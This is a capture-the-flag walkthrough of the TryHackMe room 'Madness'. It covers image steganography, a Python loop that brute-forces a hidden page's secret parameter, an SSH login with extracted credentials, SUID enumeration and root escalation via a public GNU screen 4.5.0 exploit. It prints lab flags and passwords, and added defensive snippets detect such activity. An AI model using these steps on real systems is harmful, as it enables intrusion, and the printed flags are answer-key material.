Madness
In this post, we will look into the room “Madness” from TryHackMe, which can be found on https://tryhackme.com
#1 - user.txt
Hint: There’s something ROTten about this guys name!
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ac:f9:85:10:52:65:6e:17:f5:1c:34:e7:d8:64:67:b1 (RSA)
|   256 dd:8e:5a:ec:b1:95:cd:dc:4d:01:b3:fe:5f:4e:12:c1 (ECDSA)
|_  256 e9:ed:e3:eb:58:77:3b:00:5e:3a:f5:24:d8:58:34:8e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Have a close look at the Apache2 Ubuntu default page, it has been modified:
$ curl -s http://10.10.109.114
[REDACTED]
<body>
  <div class="main_page">
    <div class="page_header floating_element">
      <img src="thm.jpg" class="floating_element"/>
      <!-- They will never find me-->
      <span class="floating_element">
        Apache2 Ubuntu Default Page
      </span>
    </div>
<!--
    <div class="table_of_contents floating_element">
      <div class="section_header section_header_grey">
[REDACTED]
The file header (89 50 4e 47 0d 0a 1a 0a) indicates that the file is a PNG, while the extension is *.jpg.
$ wget http://10.10.109.114/thm.jpg
$ xxd thm.jpg | head
00000000: 8950 4e47 0d0a 1a0a 0000 0001 0100 0001  .PNG............
00000010: 0001 0000 ffdb 0043 0003 0202 0302 0203  .......C........
00000020: 0303 0304 0303 0405 0805 0504 0405 0a07  ................
00000030: 0706 080c 0a0c 0c0b 0a0b 0b0d 0e12 100d  ................
00000040: 0e11 0e0b 0b10 1610 1113 1415 1515 0c0f  ................
00000050: 1718 1614 1812 1415 14ff db00 4301 0304  ............C...
00000060: 0405 0405 0905 0509 140d 0b0d 1414 1414  ................
00000070: 1414 1414 1414 1414 1414 1414 1414 1414  ................
00000080: 1414 1414 1414 1414 1414 1414 1414 1414  ................
00000090: 1414 1414 1414 1414 1414 1414 1414 ffc0  ................
Let’s overwrite the first 12 bytes with a valid JPEG (JFIF) header:
$ printf '\xff\xd8\xff\xe0\x00\x10\x4a\x46\x49\x46\x00\x01' | dd conv=notrunc of=thm.jpg bs=1
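As an added example (not from the original write-up), here is a small Python check that classifies a file by its leading bytes rather than its extension and flags exactly the situation seen with thm.jpg: a PNG signature sitting on top of a JPEG body. The sample bytes are the first 32 bytes from the xxd dump above; the function names and the "verdict" strings are assumptions of this example.

```python
import os

# Magic bytes for the two container formats in play on this page.
PNG_MAGIC = bytes.fromhex("89504e470d0a1a0a")
JPEG_SOI = bytes.fromhex("ffd8ff")      # JPEG Start Of Image marker
JPEG_DQT = bytes.fromhex("ffdb")        # JPEG Define Quantization Table marker
JPEG_SOF0 = bytes.fromhex("ffc0")       # JPEG baseline Start Of Frame marker

def magic_type(data: bytes) -> str:
    """Container type claimed by the file's leading bytes."""
    if data.startswith(PNG_MAGIC):
        return "png"
    if data.startswith(JPEG_SOI):
        return "jpeg"
    return "unknown"

def looks_like_jpeg_body(data: bytes) -> bool:
    """A real PNG has an IHDR chunk right after its 8-byte signature;
    a JPEG body carries DQT / SOF markers instead."""
    has_ihdr = data[12:16] == b"IHDR"
    has_jpeg_markers = JPEG_DQT in data[:64] or JPEG_SOF0 in data
    return not has_ihdr and has_jpeg_markers

def check_file(name: str, data: bytes) -> dict:
    """Compare extension, magic bytes and body; return a small verdict record."""
    ext = os.path.splitext(name)[1].lower().lstrip(".")
    ext = "jpeg" if ext == "jpg" else ext
    claimed = magic_type(data)
    if claimed == "png" and looks_like_jpeg_body(data):
        verdict = "png header on jpeg body"
    elif claimed != ext:
        verdict = "extension/magic mismatch"
    else:
        verdict = "ok"
    return {"extension": ext, "magic": claimed, "verdict": verdict}

# Constructed sample: the first 32 bytes of thm.jpg, copied from the xxd dump above.
THM_JPG_HEAD = bytes.fromhex(
    "89504e470d0a1a0a0000000101000001"
    "00010000ffdb00430003020203020203")

if __name__ == "__main__":
    print(check_file("thm.jpg", THM_JPG_HEAD))   # verdict: png header on jpeg body
```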
The picture discloses a hidden location:
$ curl -s http://10.10.109.114/th1s_1s_h1dd3n/
<html>
<head>
<title>Hidden Directory</title>
<link href="stylesheet.css" rel="stylesheet" type="text/css">
</head>
<body>
<div class="main">
<h2>Welcome! I have been expecting you!</h2>
<p>To obtain my identity you need to guess my secret! </p>
<!-- It's between 0-99 but I don't think anyone will look here-->
<p>Secret Entered: </p>
<p>That is wrong! Get outta here!</p>
</div>
</body>
</html>
Based on the comment, we can guess that the page expects a number to be provided as a query parameter:
$ curl -s http://10.10.109.114/th1s_1s_h1dd3n/?secret=34
<html>
<head>
<title>Hidden Directory</title>
<link href="stylesheet.css" rel="stylesheet" type="text/css">
</head>
<body>
<div class="main">
<h2>Welcome! I have been expecting you!</h2>
<p>To obtain my identity you need to guess my secret! </p>
<!-- It's between 0-99 but I don't think anyone will look here-->
<p>Secret Entered: 34</p>
<p>That is wrong! Get outta here!</p>
</div>
</body>
</html>
OK, let’s script it in Python:
#!/usr/bin/env python3
import requests

host = '10.10.109.114'
url = 'http://{}/th1s_1s_h1dd3n/?secret={}'

# The comment in the page says the secret is between 0 and 99.
for i in range(100):
    r = requests.get(url.format(host, i))
    # The page answers "That is wrong!" for every bad guess.
    if 'That is wrong!' not in r.text:
        print("Found secret: {}".format(i))
        print(r.text)
Here is the output of the script:
$ python secret.py
Found secret: 73
<html>
<head>
<title>Hidden Directory</title>
<link href="stylesheet.css" rel="stylesheet" type="text/css">
</head>
<body>
<div class="main">
<h2>Welcome! I have been expecting you!</h2>
<p>To obtain my identity you need to guess my secret! </p>
<!-- It's between 0-99 but I don't think anyone will look here-->
<p>Secret Entered: 73</p>
<p>Urgh, you got it right! But I won't tell you who I am! y2RPJ4QaPF!B</p>
</div>
</body>
</html>
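Seen from the server side, the loop above produces a hundred requests with distinct secret values from one client in a short time. As an added example (not part of the original write-up), this Python snippet parses Apache combined-format access logs and flags that pattern per client and path; the log lines, addresses and timestamps are constructed, and the threshold of 20 distinct values is an arbitrary assumption.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log format: ip ident user [ts] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')

def parse_line(line: str):
    """Parse one access-log line into ip / path / query params, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {"ip": m.group("ip"), "path": parts.path,
            "params": parse_qs(parts.query), "status": int(m.group("status"))}

def find_enumeration(lines, param="secret", threshold=20):
    """Return {(ip, path): distinct_values} for clients that tried at least
    `threshold` different values of `param` against the same path."""
    seen = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec and param in rec["params"]:
            seen[(rec["ip"], rec["path"])].update(rec["params"][param])
    return {key: len(vals) for key, vals in seen.items() if len(vals) >= threshold}

def make_sample_log():
    """Constructed log: one client walking secret=0..99 like secret.py, plus one
    ordinary visitor. Addresses and timestamps are made up."""
    lines = ['198.51.100.7 - - [04/Jan/2021:14:03:%02d +0000] '
             '"GET /th1s_1s_h1dd3n/?secret=%d HTTP/1.1" 200 512 "-" "python-requests/2.25"'
             % (i % 60, i) for i in range(100)]
    lines.append('203.0.113.9 - - [04/Jan/2021:14:05:01 +0000] '
                 '"GET /th1s_1s_h1dd3n/?secret=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"')
    return lines

if __name__ == "__main__":
    for (ip, path), count in find_enumeration(make_sample_log()).items():
        print(f"{ip} tried {count} distinct 'secret' values against {path}")
```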
Looks like we have a password (y2RPJ4QaPF!B) but no user name, and we are instructed not to brute force SSH. I first tried a few usernames that I found relevant, but none worked:
- th1s_1s_h1dd3n
- th1s_1s_h1dd3n-73
- th1s_1s_h1dd3n_73
- madness
- madness73
- madness_73
- madness-73
- thm
- thm73
- thm_73
- thm-73
- seventythree
- seventy_three
- seventy-three
Then I saw the hint (There's something ROTten about this guys name!) and thought there might be something else to get from the picture.
Nothing with binwalk, but steghide was luckier (use the password found above as the passphrase):
$ steghide info thm.jpg
"thm.jpg":
  format: jpeg
  capacity: 1.0 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
  embedded file "hidden.txt":
    size: 101.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes
$ steghide extract -sf thm.jpg
Enter passphrase:
wrote extracted data to "hidden.txt".
$ cat hidden.txt
Fine you found the password! Here's a username wbxre I didn't say I would make it easy for you!
Now, let’s ROT13 this username:
$ echo -n "wbxre" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
joker
I tried to connect as joker with the password, but no luck. I also tried to ROT13 the password, no luck either…
I’ll be honest, I was about to stop here and searched in one of the available writeups. I found that the password is located in the picture of this room… Seriously, who would expect that? Anyway, let’s take this as a hint (it would maybe make sense to add a hint, BTW).
Use steghide (with an empty passphrase) to reveal the password:
$ wget https://i.imgur.com/5iW7kC8.jpg
$ steghide info 5iW7kC8.jpg
"5iW7kC8.jpg":
  format: jpeg
  capacity: 6.6 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
  embedded file "password.txt":
    size: 83.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes
$ steghide extract -sf 5iW7kC8.jpg
Enter passphrase:
wrote extracted data to "password.txt".
$ cat password.txt
I didn't think you'd find me! Congratulations! Here take my password *axA&GF8dP
Great, now we have a valid user and password.
$ sshpass -p "*axA&GF8dP" ssh joker@10.10.109.114
joker@ubuntu:~$ pwd
/home/joker
joker@ubuntu:~$ cat user.txt
THM{d5781e53b130efe2f94f9b0354a5e4ea}
User flag: THM{d5781e53b130efe2f94f9b0354a5e4ea}
#2 - root.txt
The user has no sudo privileges, but there are interesting programs owned by root with the SUID bit set:
joker@ubuntu:~$ /bin/bash
joker@ubuntu:~$ find / -user root -perm -u=s 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/vmware-user-suid-wrapper
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/sudo
/bin/fusermount
/bin/su
/bin/ping6
/bin/screen-4.5.0
/bin/screen-4.5.0.old
/bin/mount
/bin/ping
/bin/umount
joker@ubuntu:~$ ls -l /bin/screen*
lrwxrwxrwx 1 root root      12 Jan  4 14:03 /bin/screen -> screen-4.5.0
-rwsr-xr-x 1 root root 1588648 Jan  4 14:03 /bin/screen-4.5.0
-rwsr-xr-x 1 root root 1588648 Jan  4 13:59 /bin/screen-4.5.0.old
lrwxrwxrwx 1 root root      12 Jan  4 13:59 /bin/screen.old -> screen-4.5.0
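As an added example (not part of the original write-up), this Python script compares a SUID inventory like the one above against a baseline taken from a known-good host, so that hand-installed copies such as /bin/screen-4.5.0 and its .old twin stand out from the distribution's own SUID helpers. The baseline list is a constructed assumption rather than a real package manifest, and the "current" inventory mirrors the find output above.

```python
import re

# Constructed baseline: SUID-root binaries expected on a stock host of this
# kind (the vmware wrapper is included because the target is a VM).
BASELINE = """
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/vmware-user-suid-wrapper
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/sudo
/bin/fusermount
/bin/su
/bin/ping6
/bin/mount
/bin/ping
/bin/umount
"""

# Constructed "current" inventory mirroring the find output above.
CURRENT = BASELINE + "/bin/screen-4.5.0\n/bin/screen-4.5.0.old\n"

# Names that look like versioned or backup copies: name-4.5.0, name.old, ...
VERSIONED = re.compile(r"(-\d+(\.\d+)+|\.old)$")

def parse_list(text: str) -> set:
    """One path per line, blanks ignored."""
    return {line.strip() for line in text.splitlines() if line.strip()}

def audit_suid(current: str, baseline: str) -> dict:
    """Split the current SUID inventory into expected / unexpected / missing,
    and single out unexpected entries that look like hand-installed or backup
    copies, which a package manager would not normally leave SUID."""
    cur, base = parse_list(current), parse_list(baseline)
    unexpected = sorted(cur - base)
    return {"expected": sorted(cur & base),
            "unexpected": unexpected,
            "missing": sorted(base - cur),
            "versioned_copies": [p for p in unexpected if VERSIONED.search(p)]}

if __name__ == "__main__":
    for key, paths in audit_suid(CURRENT, BASELINE).items():
        print(key, paths)
```

On a real host, feed the script the output of the find command above and a baseline captured from a freshly installed machine of the same release.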
Let’s find a way to escalate to root through screen version 4.5.0 (https://www.exploit-db.com/exploits/41154). Download the exploit, transfer it to the target in /tmp and execute it. For an unknown reason, the exploit failed to execute for me:
$ sh 41154.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
I analyzed it and created the /tmp/libhax.c and rootshell.c files myself, and compiled them. It worked this way.
# cat /root/root.txt
THM{5ecd98aa66a6abb670184d7547c8124a}